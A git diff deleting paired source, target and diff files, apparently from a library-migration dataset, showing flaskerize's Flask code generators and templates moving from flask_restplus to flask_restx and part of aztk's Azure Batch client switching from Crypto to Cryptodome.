f"""{HEADER} - -from {filename} import {func} -app = {func}() - """ - _generate( - CONTENTS, - output_name=args.output_name, - filename=args.output_file, - dry_run=args.dry_run, - ) - print("Successfully created new wsgi") - - -def namespace(args): - """ - Generate a new Flask-RESTplus API Namespace - """ - - CONTENTS = f"""from flask import request, jsonify -from flask_restplus import Namespace, Resource -from flask_accepts import accepts, responds -import marshmallow as ma - -api = Namespace('{args.output_name}', description='All things {args.output_name}') - - -class {args.output_name.title()}: - '''A super awesome {args.output_name}''' - - def __init__(self, id: int, a_float: float = 42.0, description: str = ''): - self.id = id - self.a_float = a_float - self.description = description - - -class {args.output_name.title()}Schema(ma.Schema): - id = ma.fields.Integer() - a_float = ma.fields.Float() - description = ma.fields.String(256) - - @ma.post_load - def make(self, kwargs): - return {args.output_name.title()}(**kwargs) - - -@api.route('/') -class {args.output_name.title()}Resource(Resource): - @accepts(schema={args.output_name.title()}Schema, api=api) - @responds(schema={args.output_name.title()}Schema) - def post(self): - return request.parsed_obj - - @accepts(dict(name='id', type=int, help='ID of the {args.output_name.title()}'), api=api) - @responds(schema={args.output_name.title()}Schema) - def get(self): - return {args.output_name.title()}(id=request.parsed_args['id']) - - @accepts(schema={args.output_name.title()}Schema, api=api) - @responds(schema={args.output_name.title()}Schema) - def update(self, id, data): - pass - - @accepts(dict(name='id', type=int, help='ID of the {args.output_name.title()}'), api=api) - def delete(self, id): - pass - -""" - print(args) - _generate( - CONTENTS, - output_name=args.output_name, - filename=args.output_file, - dry_run=args.dry_run, - ) - - 
-    if not args.without_test:
-        namespace_test(args)
-
-
-def namespace_test(args):
-    """
-    Generate a new Flask-RESTplus API Namespace
-    """
-
-    CONTENTS = f"""import pytest
-
-from app.test.fixtures import app, client
-from .{args.output_name} import {args.output_name.title()}, {args.output_name.title()}Schema
-
-
-@pytest.fixture
-def schema():
-    return {args.output_name.title()}Schema()
-
-
-def test_schema_valid(schema): # noqa
-    assert schema
-
-
-def test_post(app, client, schema): # noqa
-    with client:
-        obj = {args.output_name.title()}(id=42)
-        resp = client.post('{args.output_name}/', json=schema.dump(obj).data)
-        rv = schema.load(resp.json).data
-        assert obj.id == rv.id
-
-
-def test_get(app, client, schema): # noqa
-    with client:
-        resp = client.get('{args.output_name}/?id=42')
-        rv = schema.load(resp.json).data
-        assert rv
-        assert rv.id == 42
-
-"""
-    print(args)
-    _generate(
-        CONTENTS,
-        output_name=args.output_name
-        and args.output_name.replace(".py", "") + "_test.py",
-        filename=args.output_file and args.output_file.replace(".py", "") + "_test.py",
-        dry_run=args.dry_run,
-    )
-
-
-def dockerfile(args):
-    import os
-
-    CONTENTS = f"""FROM python:3.7 as base
-
-FROM base as builder
-RUN mkdir /install
-WORKDIR /install
-RUN pip install --install-option="--prefix=/install" gunicorn
-RUN pip install --install-option="--prefix=/install" flask
-
-FROM base
-COPY --from=builder /install /usr/local
-COPY . /app
-WORKDIR /app
-
-EXPOSE 8080
-ENTRYPOINT ["gunicorn", "--bind", "0.0.0.0:8080", "--access-logfile", "-", "--error-logfile", "-", "{args.source}"]
-
-"""
-    _generate(
-        CONTENTS,
-        output_name=args.output_name,
-        filename=args.output_file,
-        dry_run=args.dry_run,
-    )
-    print("Successfully created new Dockerfile")
-    print(
-        "Next, run `docker build -t my_app_image .` to build the docker image and "
-        "then use `docker run my_app_image -p 127.0.0.1:80:8080` to launch"
-    )
-
-
-# Mapping of keywords to generation functions
-a: Dict[str, Callable] = {
-    "hello-world": hello_world,
-    "hw": hello_world,
-    "dockerfile": dockerfile,
-    "wsgi": wsgi,
-    "app_from_dir": app_from_dir,
-    "blueprint": blueprint,
-    "bp": blueprint,
-    "namespace": namespace,
-    "ns": namespace,
-}
diff --git a/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$generate.py.target.py b/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$generate.py.target.py
deleted file mode 100644
index ce737e1..0000000
--- a/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$generate.py.target.py
+++ /dev/null
@@ -1,302 +0,0 @@
-from typing import Callable, Dict
-
-HEADER = """# DO NOT EDIT THIS FILE. It is generated by flaskerize and may be
-# overwritten"""
-
-
-def _generate(
-    contents,
-    output_name: str,
-    filename: str = None,
-    mode: str = "w",
-    dry_run: bool = False,
-) -> None:
-    if dry_run:
-        print(contents)
-    else:
-        if filename is None:
-            filename = f'{output_name.replace(".py", "")}.py'
-        with open(filename, mode) as fid:
-            fid.write(contents)
-
-        if filename:
-            print(f"Successfully created {filename}")
-
-
-def hello_world(args) -> None:
-    print("Generating a hello_world app")
-
-    CONTENTS = f"""{HEADER}
-
-import os
-from flask import Flask, send_from_directory
-
-def create_app():
-    app = Flask(__name__)
-
-    # Serve React App
-    @app.route('/')
-    def serve():
-        return 'Hello, Flaskerize!'
-    return app
-
-if __name__ == '__main__':
-    app = create_app()
-    app.run()
-
-    """
-    _generate(
-        CONTENTS,
-        output_name=args.output_name,
-        filename=args.output_file,
-        dry_run=args.dry_run,
-    )
-    print("Successfully created new app")
-
-
-def app_from_dir(args) -> None:
-    """
-    Serve files using `send_from_directory`. Note this is less secure than
-    from_static_files as anything within the directory can be served.
-    """
-
-    print("Generating an app from static site directory")
-
-    # The routing for `send_from_directory` comes directly from https://stackoverflow.com/questions/44209978/serving-a-create-react-app-with-flask # noqa
-    CONTENTS = f"""{HEADER}
-
-import os
-from flask import Flask, send_from_directory
-
-
-def create_app():
-    app = Flask(__name__, static_folder='{args.source}')
-
-    # Serve static site
-    @app.route('/')
-    def index():
-        return send_from_directory(app.static_folder, 'index.html')
-
-    return app
-
-if __name__ == '__main__':
-    app = create_app()
-    app.run()
-
-"""
-    _generate(
-        CONTENTS,
-        output_name=args.output_name,
-        filename=args.output_file,
-        dry_run=args.dry_run,
-    )
-    print("Successfully created new app")
-
-
-def blueprint(args):
-    """
-    Static site blueprint
-    """
-
-    print("Generating a blueprint from static site")
-
-    # The routing for `send_from_directory` comes directly from https://stackoverflow.com/questions/44209978/serving-a-create-react-app-with-flask # noqa
-    CONTENTS = f"""{HEADER}
-
-import os
-from flask import Blueprint, send_from_directory
-
-site = Blueprint('site', __name__, static_folder='{args.source}')
-
-# Serve static site
-@site.route('/')
-def index():
-    return send_from_directory(site.static_folder, 'index.html')
-
-"""
-    _generate(
-        CONTENTS,
-        output_name=args.output_name,
-        filename=args.output_file,
-        dry_run=args.dry_run,
-    )
-    print("Successfully created new blueprint")
-
-
-def wsgi(args):
-    from flaskerize.utils import split_file_factory
-
-    filename, func = split_file_factory(args.source)
-    filename = filename.replace(".py", "")
-
-    CONTENTS = f"""{HEADER}
-
-from {filename} import {func}
-app = {func}()
-    """
-    _generate(
-        CONTENTS,
-        output_name=args.output_name,
-        filename=args.output_file,
-        dry_run=args.dry_run,
-    )
-    print("Successfully created new wsgi")
-
-
-def namespace(args):
-    """
-    Generate a new Flask-RESTplus API Namespace
-    """
-
-    CONTENTS = f"""from flask import request, jsonify
-from flask_restx import Namespace, Resource
-from flask_accepts import accepts, responds
-import marshmallow as ma
-
-api = Namespace('{args.output_name}', description='All things {args.output_name}')
-
-
-class {args.output_name.title()}:
-    '''A super awesome {args.output_name}'''
-
-    def __init__(self, id: int, a_float: float = 42.0, description: str = ''):
-        self.id = id
-        self.a_float = a_float
-        self.description = description
-
-
-class {args.output_name.title()}Schema(ma.Schema):
-    id = ma.fields.Integer()
-    a_float = ma.fields.Float()
-    description = ma.fields.String(256)
-
-    @ma.post_load
-    def make(self, kwargs):
-        return {args.output_name.title()}(**kwargs)
-
-
-@api.route('/')
-class {args.output_name.title()}Resource(Resource):
-    @accepts(schema={args.output_name.title()}Schema, api=api)
-    @responds(schema={args.output_name.title()}Schema)
-    def post(self):
-        return request.parsed_obj
-
-    @accepts(dict(name='id', type=int, help='ID of the {args.output_name.title()}'), api=api)
-    @responds(schema={args.output_name.title()}Schema)
-    def get(self):
-        return {args.output_name.title()}(id=request.parsed_args['id'])
-
-    @accepts(schema={args.output_name.title()}Schema, api=api)
-    @responds(schema={args.output_name.title()}Schema)
-    def update(self, id, data):
-        pass
-
-    @accepts(dict(name='id', type=int, help='ID of the {args.output_name.title()}'), api=api)
-    def delete(self, id):
-        pass
-
-"""
-    print(args)
-    _generate(
-        CONTENTS,
-        output_name=args.output_name,
-        filename=args.output_file,
-        dry_run=args.dry_run,
-    )
-
-    if not args.without_test:
-        namespace_test(args)
-
-
-def namespace_test(args):
-    """
-    Generate a new Flask-RESTplus API Namespace
-    """
-
-    CONTENTS = f"""import pytest
-
-from app.test.fixtures import app, client
-from .{args.output_name} import {args.output_name.title()}, {args.output_name.title()}Schema
-
-
-@pytest.fixture
-def schema():
-    return {args.output_name.title()}Schema()
-
-
-def test_schema_valid(schema): # noqa
-    assert schema
-
-
-def test_post(app, client, schema): # noqa
-    with client:
-        obj = {args.output_name.title()}(id=42)
-        resp = client.post('{args.output_name}/', json=schema.dump(obj).data)
-        rv = schema.load(resp.json).data
-        assert obj.id == rv.id
-
-
-def test_get(app, client, schema): # noqa
-    with client:
-        resp = client.get('{args.output_name}/?id=42')
-        rv = schema.load(resp.json).data
-        assert rv
-        assert rv.id == 42
-
-"""
-    print(args)
-    _generate(
-        CONTENTS,
-        output_name=args.output_name
-        and args.output_name.replace(".py", "") + "_test.py",
-        filename=args.output_file and args.output_file.replace(".py", "") + "_test.py",
-        dry_run=args.dry_run,
-    )
-
-
-def dockerfile(args):
-    import os
-
-    CONTENTS = f"""FROM python:3.7 as base
-
-FROM base as builder
-RUN mkdir /install
-WORKDIR /install
-RUN pip install --install-option="--prefix=/install" gunicorn
-RUN pip install --install-option="--prefix=/install" flask
-
-FROM base
-COPY --from=builder /install /usr/local
-COPY . /app
-WORKDIR /app
-
-EXPOSE 8080
-ENTRYPOINT ["gunicorn", "--bind", "0.0.0.0:8080", "--access-logfile", "-", "--error-logfile", "-", "{args.source}"]
-
-"""
-    _generate(
-        CONTENTS,
-        output_name=args.output_name,
-        filename=args.output_file,
-        dry_run=args.dry_run,
-    )
-    print("Successfully created new Dockerfile")
-    print(
-        "Next, run `docker build -t my_app_image .` to build the docker image and "
-        "then use `docker run my_app_image -p 127.0.0.1:80:8080` to launch"
-    )
-
-
-# Mapping of keywords to generation functions
-a: Dict[str, Callable] = {
-    "hello-world": hello_world,
-    "hw": hello_world,
-    "dockerfile": dockerfile,
-    "wsgi": wsgi,
-    "app_from_dir": app_from_dir,
-    "blueprint": blueprint,
-    "bp": blueprint,
-    "namespace": namespace,
-    "ns": namespace,
-}
diff --git a/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$entity$files${{ name }}.template$controller.py.template.diff b/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$entity$files${{ name }}.template$controller.py.template.diff
deleted file mode 100644
index 0aa8163..0000000
--- a/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$entity$files${{ name }}.template$controller.py.template.diff
+++ /dev/null
@@ -1,13 +0,0 @@
-diff --git a/flaskerize/schematics/entity/files/{{ name }}.template/controller.py.template b/flaskerize/schematics/entity/files/{{ name }}.template/controller.py.template
- index ab2ea26e8a6180adc43c43e24f5ecb3ad3708e89..59d8319355bf95f26949fe13ac3d6be5b5282fb6 100644
- --- a/flaskerize/schematics/entity/files/{{ name }}.template/controller.py.template
- +++ b/flaskerize/schematics/entity/files/{{ name }}.template/controller.py.template
-@@ -1,6 +1,6 @@
--from flask_restplus import Resource
-+from flask_restx import Resource
- from flask import request
--from flask_restplus import Namespace
-+from flask_restx import Namespace
- from flask_accepts import accepts, responds
- from flask.wrappers import Response
- from typing import List
diff --git a/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$entity$files${{ name }}.template$controller.py.template.source.py b/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$entity$files${{ name }}.template$controller.py.template.source.py
deleted file mode 100644
index 324fb5a..0000000
--- a/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$entity$files${{ name }}.template$controller.py.template.source.py
+++ /dev/null
@@ -1,57 +0,0 @@
-from flask_restplus import Resource
-from flask import request
-from flask_restplus import Namespace
-from flask_accepts import accepts, responds
-from flask.wrappers import Response
-from typing import List
-
-from .schema import {{ capitalize(name) }}Schema
-from .model import {{ capitalize(name) }}
-from .service import {{ capitalize(name) }}Service
-
-api = Namespace("{{ capitalize(name) }}", description="{{ capitalize(name) }} information")
-
-
-@api.route("/")
-class {{ capitalize(name) }}Resource(Resource):
-    """{{ capitalize(name) }}s"""
-
-    @responds(schema={{ capitalize(name) }}Schema, many=True)
-    def get(self) -> List[{{ capitalize(name) }}]:
-        """Get all {{ capitalize(name) }}s"""
-
-        return {{ capitalize(name) }}Service.get_all()
-
-    @accepts(schema={{ capitalize(name) }}Schema, api=api)
-    @responds(schema={{ capitalize(name) }}Schema)
-    def post(self):
-        """Create a Single {{ capitalize(name) }}"""
-
-        return {{ capitalize(name) }}Service.create(request.parsed_obj)
-
-
-@api.route("/<int:{{ lower(name) }}Id>")
-@api.param("{{ lower(name) }}Id", "{{ capitalize(name) }} database ID")
lower(name) }}Id", "{{ capitalize(name) }} database ID") -class {{ capitalize(name) }}IdResource(Resource): - @responds(schema={{ capitalize(name) }}Schema) - def get(self, {{ lower(name) }}Id: int) -> {{ capitalize(name) }}: - """Get Single {{ capitalize(name) }}""" - - return {{ capitalize(name) }}Service.get_by_id({{ lower(name) }}Id) - - def delete(self, {{ lower(name) }}Id: int) -> Response: - """Delete Single {{ capitalize(name) }}""" - - from flask import jsonify - - id = {{ capitalize(name) }}Service.delete_by_id({{ lower(name) }}Id) - return jsonify(dict(status="Success", id=id)) - - @accepts(schema={{ capitalize(name) }}Schema, api=api) - @responds(schema={{ capitalize(name) }}Schema) - def put(self, {{ lower(name) }}Id: int) -> {{ capitalize(name) }}: - """Update Single {{ capitalize(name) }}""" - - changes = request.parsed_obj - {{ lower(name) }} = {{ capitalize(name) }}Service.get_by_id({{ lower(name) }}Id) - return {{ capitalize(name) }}Service.update({{ lower(name) }}, changes) diff --git a/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$entity$files${{ name }}.template$controller.py.template.target.py b/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$entity$files${{ name }}.template$controller.py.template.target.py deleted file mode 100644 index 47875ad..0000000 --- a/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$entity$files${{ name }}.template$controller.py.template.target.py +++ /dev/null @@ -1,57 +0,0 @@ -from flask_restx import Resource -from flask import request -from flask_restx import Namespace -from flask_accepts import accepts, responds -from flask.wrappers import Response -from typing import List - -from .schema import {{ capitalize(name) }}Schema -from .model import {{ capitalize(name) }} -from .service import {{ capitalize(name) }}Service - -api = Namespace("{{ capitalize(name) }}", description="{{ capitalize(name) }} information") - - -@api.route("/") -class {{ capitalize(name) }}Resource(Resource): - """{{ capitalize(name) }}s""" - - @responds(schema={{ capitalize(name) }}Schema, many=True) - def get(self) -> List[{{ capitalize(name) }}]: - """Get all {{ capitalize(name) }}s""" - - return {{ capitalize(name) }}Service.get_all() - - @accepts(schema={{ capitalize(name) }}Schema, api=api) - @responds(schema={{ capitalize(name) }}Schema) - def post(self): - """Create a Single {{ capitalize(name) }}""" - - return {{ capitalize(name) }}Service.create(request.parsed_obj) - - -@api.route("/") -@api.param("{{ lower(name) }}Id", "{{ capitalize(name) }} database ID") -class {{ capitalize(name) }}IdResource(Resource): - @responds(schema={{ capitalize(name) }}Schema) - def get(self, {{ lower(name) }}Id: int) -> {{ capitalize(name) }}: - """Get Single {{ capitalize(name) }}""" - - return {{ capitalize(name) }}Service.get_by_id({{ lower(name) }}Id) - - def delete(self, {{ lower(name) }}Id: int) -> Response: - """Delete Single {{ capitalize(name) }}""" - - from flask import jsonify - - id = {{ capitalize(name) }}Service.delete_by_id({{ lower(name) }}Id) - return jsonify(dict(status="Success", id=id)) - - @accepts(schema={{ capitalize(name) }}Schema, api=api) - @responds(schema={{ capitalize(name) }}Schema) - def put(self, {{ lower(name) }}Id: int) -> {{ capitalize(name) }}: - """Update Single {{ capitalize(name) }}""" - - changes = request.parsed_obj - {{ lower(name) }} = {{ capitalize(name) }}Service.get_by_id({{ lower(name) }}Id) - return {{ capitalize(name) }}Service.update({{ lower(name) }}, changes) diff 
diff --git a/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$flask-api$files${{ name }}.template$app$__init__.py.diff b/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$flask-api$files${{ name }}.template$app$__init__.py.diff
deleted file mode 100644
index f5fbdaa..0000000
--- a/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$flask-api$files${{ name }}.template$app$__init__.py.diff
+++ /dev/null
@@ -1,12 +0,0 @@
-diff --git a/flaskerize/schematics/flask-api/files/{{ name }}.template/app/__init__.py b/flaskerize/schematics/flask-api/files/{{ name }}.template/app/__init__.py
- index ab2ea26e8a6180adc43c43e24f5ecb3ad3708e89..59d8319355bf95f26949fe13ac3d6be5b5282fb6 100644
- --- a/flaskerize/schematics/flask-api/files/{{ name }}.template/app/__init__.py
- +++ b/flaskerize/schematics/flask-api/files/{{ name }}.template/app/__init__.py
-@@ -1,6 +1,6 @@
- from flask import Flask, jsonify
- from flask_sqlalchemy import SQLAlchemy
--from flask_restplus import Api
-+from flask_restx import Api
-
- db = SQLAlchemy()
-
diff --git a/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$flask-api$files${{ name }}.template$app$__init__.py.source.py b/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$flask-api$files${{ name }}.template$app$__init__.py.source.py
deleted file mode 100644
index 64fbf94..0000000
--- a/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$flask-api$files${{ name }}.template$app$__init__.py.source.py
+++ /dev/null
@@ -1,23 +0,0 @@
-from flask import Flask, jsonify
-from flask_sqlalchemy import SQLAlchemy
-from flask_restplus import Api
-
-db = SQLAlchemy()
-
-
-def create_app(env=None):
-    from app.config import config_by_name
-    from app.routes import register_routes
-
-    app = Flask(__name__)
-    app.config.from_object(config_by_name[env or "test"])
-    api = Api(app, title="Flaskerific API", version="0.1.0")
-
-    register_routes(api, app)
-    db.init_app(app)
-
-    @app.route("/health")
-    def health():
-        return jsonify("healthy")
-
-    return app
diff --git a/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$flask-api$files${{ name }}.template$app$__init__.py.target.py b/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$flask-api$files${{ name }}.template$app$__init__.py.target.py
deleted file mode 100644
index 0e6f678..0000000
--- a/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$flask-api$files${{ name }}.template$app$__init__.py.target.py
+++ /dev/null
@@ -1,23 +0,0 @@
-from flask import Flask, jsonify
-from flask_sqlalchemy import SQLAlchemy
-from flask_restx import Api
-
-db = SQLAlchemy()
-
-
-def create_app(env=None):
-    from app.config import config_by_name
-    from app.routes import register_routes
-
-    app = Flask(__name__)
-    app.config.from_object(config_by_name[env or "test"])
-    api = Api(app, title="Flaskerific API", version="0.1.0")
-
-    register_routes(api, app)
-    db.init_app(app)
-
-    @app.route("/health")
-    def health():
-        return jsonify("healthy")
-
-    return app
diff --git a/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$flask-api$files${{ name }}.template$app$widget$controller.py.diff b/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$flask-api$files${{ name }}.template$app$widget$controller.py.diff
deleted file mode 100644
index 16eac20..0000000
--- a/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$flask-api$files${{ name }}.template$app$widget$controller.py.diff
+++ /dev/null
@@ -1,12 +0,0 @@
-diff --git a/flaskerize/schematics/flask-api/files/{{ name }}.template/app/widget/controller.py b/flaskerize/schematics/flask-api/files/{{ name }}.template/app/widget/controller.py
- index ab2ea26e8a6180adc43c43e24f5ecb3ad3708e89..59d8319355bf95f26949fe13ac3d6be5b5282fb6 100644
- --- a/flaskerize/schematics/flask-api/files/{{ name }}.template/app/widget/controller.py
- +++ b/flaskerize/schematics/flask-api/files/{{ name }}.template/app/widget/controller.py
-@@ -1,6 +1,6 @@
- from flask import request
- from flask_accepts import accepts, responds
--from flask_restplus import Namespace, Resource
-+from flask_restx import Namespace, Resource
- from flask.wrappers import Response
- from typing import List
-
diff --git a/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$flask-api$files${{ name }}.template$app$widget$controller.py.source.py b/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$flask-api$files${{ name }}.template$app$widget$controller.py.source.py
deleted file mode 100644
index 364f0ee..0000000
--- a/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$flask-api$files${{ name }}.template$app$widget$controller.py.source.py
+++ /dev/null
@@ -1,56 +0,0 @@
-from flask import request
-from flask_accepts import accepts, responds
-from flask_restplus import Namespace, Resource
-from flask.wrappers import Response
-from typing import List
-
-from .schema import WidgetSchema
-from .service import WidgetService
-from .model import Widget
-from .interface import WidgetInterface
-
-api = Namespace("Widget", description="Single namespace, single entity") # noqa
-
-
-@api.route("/")
-class WidgetResource(Resource):
-    """Widgets"""
-
-    @responds(schema=WidgetSchema, many=True)
-    def get(self) -> List[Widget]:
-        """Get all Widgets"""
-
-        return WidgetService.get_all()
-
-    @accepts(schema=WidgetSchema, api=api)
-    @responds(schema=WidgetSchema)
-    def post(self) -> Widget:
-        """Create a Single Widget"""
-
-        return WidgetService.create(request.parsed_obj)
-
-
-@api.route("/<int:widgetId>")
-@api.param("widgetId", "Widget database ID")
-class WidgetIdResource(Resource):
-    @responds(schema=WidgetSchema)
-    def get(self, widgetId: int) -> Widget:
-        """Get Single Widget"""
-
-        return WidgetService.get_by_id(widgetId)
-
-    def delete(self, widgetId: int) -> Response:
-        """Delete Single Widget"""
-        from flask import jsonify
-
-        id = WidgetService.delete_by_id(widgetId)
-        return jsonify(dict(status="Success", id=id))
-
-    @accepts(schema=WidgetSchema, api=api)
-    @responds(schema=WidgetSchema)
-    def put(self, widgetId: int) -> Widget:
-        """Update Single Widget"""
-
-        changes: WidgetInterface = request.parsed_obj
-        Widget = WidgetService.get_by_id(widgetId)
-        return WidgetService.update(Widget, changes)
diff --git a/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$flask-api$files${{ name }}.template$app$widget$controller.py.target.py b/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$flask-api$files${{ name }}.template$app$widget$controller.py.target.py
deleted file mode 100644
index 5d0478d..0000000
--- a/v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$flask-api$files${{ name }}.template$app$widget$controller.py.target.py
+++ /dev/null
@@ -1,56 +0,0 @@
-from flask import request
-from flask_accepts import accepts, responds
-from flask_restx import Namespace, Resource
-from flask.wrappers import Response
-from typing import List
-
-from .schema import WidgetSchema
-from .service import WidgetService
-from .model import Widget
-from .interface import WidgetInterface
-
-api = Namespace("Widget", description="Single namespace, single entity") # noqa
-
-
-@api.route("/")
-class WidgetResource(Resource):
-    """Widgets"""
-
-    @responds(schema=WidgetSchema, many=True)
-    def get(self) -> List[Widget]:
-        """Get all Widgets"""
-
-        return WidgetService.get_all()
-
-    @accepts(schema=WidgetSchema, api=api)
-    @responds(schema=WidgetSchema)
-    def post(self) -> Widget:
-        """Create a Single Widget"""
-
-        return WidgetService.create(request.parsed_obj)
-
-
-@api.route("/<int:widgetId>")
-@api.param("widgetId", "Widget database ID")
-class WidgetIdResource(Resource):
-    @responds(schema=WidgetSchema)
-    def get(self, widgetId: int) -> Widget:
-        """Get Single Widget"""
-
-        return WidgetService.get_by_id(widgetId)
-
-    def delete(self, widgetId: int) -> Response:
-        """Delete Single Widget"""
-        from flask import jsonify
-
-        id = WidgetService.delete_by_id(widgetId)
-        return jsonify(dict(status="Success", id=id))
-
-    @accepts(schema=WidgetSchema, api=api)
-    @responds(schema=WidgetSchema)
-    def put(self, widgetId: int) -> Widget:
-        """Update Single Widget"""
-
-        changes: WidgetInterface = request.parsed_obj
-        Widget = WidgetService.get_by_id(widgetId)
-        return WidgetService.update(Widget, changes)
diff --git a/v1/data/codefile/azure@aztk__19dde42__aztk$client.py.diff b/v1/data/codefile/azure@aztk__19dde42__aztk$client.py.diff
deleted file mode 100644
index 1eb6007..0000000
--- a/v1/data/codefile/azure@aztk__19dde42__aztk$client.py.diff
+++ /dev/null
@@ -1,13 +0,0 @@
-diff --git a/aztk/client.py b/aztk/client.py
- index 3d16cf39545e39ee52fa350c7f251c2cc8679228..19dde429a702c29bdcf86a69805053ecfd02edee 100644
- --- a/aztk/client.py
- +++ b/aztk/client.py
-@@ -12,7 +12,7 @@ import aztk.utils.ssh as ssh_lib
- import aztk.models as models
- import azure.batch.models as batch_models
- from azure.batch.models import batch_error
--from Crypto.PublicKey import RSA
-+from Cryptodome.PublicKey import RSA
- from aztk.internal import cluster_data
-
- class Client:
diff --git a/v1/data/codefile/azure@aztk__19dde42__aztk$client.py.source.py b/v1/data/codefile/azure@aztk__19dde42__aztk$client.py.source.py
deleted file mode 100644
index 84d2138..0000000
--- a/v1/data/codefile/azure@aztk__19dde42__aztk$client.py.source.py
+++ /dev/null
@@ -1,401 +0,0 @@
-import asyncio
-import concurrent.futures
-from datetime import datetime, timedelta, timezone
-
-import azure.batch.models as batch_models
-import azure.batch.models.batch_error as batch_error
-import aztk.utils.azure_api as azure_api
-import aztk.utils.constants as constants
-import aztk.utils.get_ssh_key as get_ssh_key
-import aztk.utils.helpers as helpers
-import aztk.utils.ssh as ssh_lib
-import aztk.models as models
-import azure.batch.models as batch_models
-from azure.batch.models import batch_error
-from Crypto.PublicKey import RSA
-from aztk.internal import cluster_data
-
-class Client:
-    def __init__(self, secrets_config: models.SecretsConfiguration):
-        self.secrets_config = secrets_config
-
-        azure_api.validate_secrets(secrets_config)
-        self.batch_client = azure_api.make_batch_client(secrets_config)
-        self.blob_client = azure_api.make_blob_client(secrets_config)
-
-    def get_cluster_config(self, cluster_id: str) -> models.ClusterConfiguration:
-        return self._get_cluster_data(cluster_id).read_cluster_config()
-
-    def _get_cluster_data(self, cluster_id: str) -> cluster_data.ClusterData:
-        """
-        Returns ClusterData object to manage data related to the given cluster id
""" - return cluster_data.ClusterData(self.blob_client, cluster_id) - - ''' - General Batch Operations - ''' - - def __delete_pool_and_job(self, pool_id: str, keep_logs: bool = False): - """ - Delete a pool and it's associated job - :param cluster_id: the pool to add the user to - :return bool: deleted the pool if exists and job if exists - """ - # job id is equal to pool id - job_id = pool_id - job_exists = True - - try: - self.batch_client.job.get(job_id) - except batch_models.batch_error.BatchErrorException: - job_exists = False - - pool_exists = self.batch_client.pool.exists(pool_id) - - if job_exists: - self.batch_client.job.delete(job_id) - - if pool_exists: - self.batch_client.pool.delete(pool_id) - - if not keep_logs: - cluster_data = self._get_cluster_data(pool_id) - cluster_data.delete_container(pool_id) - - return job_exists or pool_exists - - def __create_pool_and_job(self, cluster_conf: models.ClusterConfiguration, software_metadata_key: str, start_task, VmImageModel): - """ - Create a pool and job - :param cluster_conf: the configuration object used to create the cluster - :type cluster_conf: aztk.models.ClusterConfiguration - :parm software_metadata_key: the id of the software being used on the cluster - :param start_task: the start task for the cluster - :param VmImageModel: the type of image to provision for the cluster - :param wait: wait until the cluster is ready - """ - self._get_cluster_data(cluster_conf.cluster_id).save_cluster_config(cluster_conf) - # reuse pool_id as job_id - pool_id = cluster_conf.cluster_id - job_id = cluster_conf.cluster_id - - # Get a verified node agent sku - sku_to_use, image_ref_to_use = \ - helpers.select_latest_verified_vm_image_with_node_agent_sku( - VmImageModel.publisher, VmImageModel.offer, VmImageModel.sku, self.batch_client) - - network_conf = None - if cluster_conf.subnet_id is not None: - network_conf = batch_models.NetworkConfiguration( - subnet_id=cluster_conf.subnet_id) - auto_scale_formula = "$TargetDedicatedNodes={0}; $TargetLowPriorityNodes={1}".format( - cluster_conf.vm_count, cluster_conf.vm_low_pri_count) - - # Confiure the pool - pool = batch_models.PoolAddParameter( - id=pool_id, - virtual_machine_configuration=batch_models.VirtualMachineConfiguration( - image_reference=image_ref_to_use, - node_agent_sku_id=sku_to_use), - vm_size=cluster_conf.vm_size, - enable_auto_scale=True, - auto_scale_formula=auto_scale_formula, - auto_scale_evaluation_interval=timedelta(minutes=5), - start_task=start_task, - enable_inter_node_communication=True if not cluster_conf.subnet_id else False, - max_tasks_per_node=4, - network_configuration=network_conf, - metadata=[ - batch_models.MetadataItem( - name=constants.AZTK_SOFTWARE_METADATA_KEY, value=software_metadata_key), - batch_models.MetadataItem( - name=constants.AZTK_MODE_METADATA_KEY, value=constants.AZTK_CLUSTER_MODE_METADATA) - ]) - - # Create the pool + create user for the pool - helpers.create_pool_if_not_exist(pool, self.batch_client) - - # Create job - job = batch_models.JobAddParameter( - id=job_id, - pool_info=batch_models.PoolInformation(pool_id=pool_id)) - - # Add job to batch - self.batch_client.job.add(job) - - return helpers.get_cluster(cluster_conf.cluster_id, self.batch_client) - - def __get_pool_details(self, cluster_id: str): - """ - Print the information for the given cluster - :param cluster_id: Id of the cluster - :return pool: CloudPool, nodes: ComputeNodePaged - """ - pool = self.batch_client.pool.get(cluster_id) - nodes = 
-        return pool, nodes
-
-    def __list_clusters(self, software_metadata_key):
-        """
-        List all the cluster on your account.
-        """
-        pools = self.batch_client.pool.list()
-        software_metadata = (
-            constants.AZTK_SOFTWARE_METADATA_KEY, software_metadata_key)
-        cluster_metadata = (
-            constants.AZTK_MODE_METADATA_KEY, constants.AZTK_CLUSTER_MODE_METADATA)
-
-        aztk_pools = []
